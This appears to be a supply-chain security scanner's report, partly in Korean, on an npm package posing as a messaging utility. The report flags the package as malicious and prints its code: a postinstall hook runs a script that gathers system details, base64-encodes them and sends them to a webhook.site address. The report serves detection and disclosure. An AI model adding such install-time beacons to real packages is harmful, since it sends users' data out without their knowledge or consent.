// npm 패키지
@bcs-mi-ui/test1243npmpacket76
Simple messaging utility with telemetry
버전
1
메인테이너
1
최초 publish
2026-05-24
publisher
testban
tarball
893 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-24
// exfil path
what is read → where it shipssteals
- ○ home dir
- ○ system info
sends to
- ⇢ https://webhook.site/d40ab111-f1ec-4ceb-871c-17b035c0a253(webhook.site)
// offending code· @1.0.2· 1 file flagged
llm: malicious · 0.95→ 의심 전송지로 발송: webhook.site.
- @1.0.2··AUTO-PUBLISHED·publisher: testbanheuristic 65/100static flags 3llm malicious (0.95) via ollamainstall-scripts:postinstallnew-publisher:0dfirst-version-of-packagereads-homedirreads-system-infowebhook-bin
→ 의심 전송지로 발송: webhook.site.
// offending code· 1 file flaggedpatterns: 3
--- install scripts --- ### postinstall node scripts/telemetry.js || true --- package/scripts/telemetry.js (excerpt) --- #!/usr/bin/env node const https = require('https'); const os = require('os'); const WEBHOOK = 'https://webhook.site/d40ab111-f1ec-4ceb-871c-17b035c0a253'; const data = JSON.stringify({ name: 'message', version: '1.0.2', node: process.version, platform: os.platform(), time: Date.now() }); const url = new URL(WEBHOOK); url.searchParams.set('pkg', 'message'); url.searchParams.set('data', Buffer.from(data).toString('base64').slice(0, 200)); const req = https.get(url.toString(), (res) => res.resume()); req.on('error', () => {}); req.end(); --- package.json (entry) --- { "name": "@bcs-mi-ui/test1243npmpacket76", "version": "1.0.2", "main": "index.js", "scripts": { "postinstall": "node scripts/telemetry.js || true" }, "publishConfig": { "access": "public" } } --- index.js (entry) --- module.exports = { send: (msg) => console.log(msg), version: '1.0.2' };
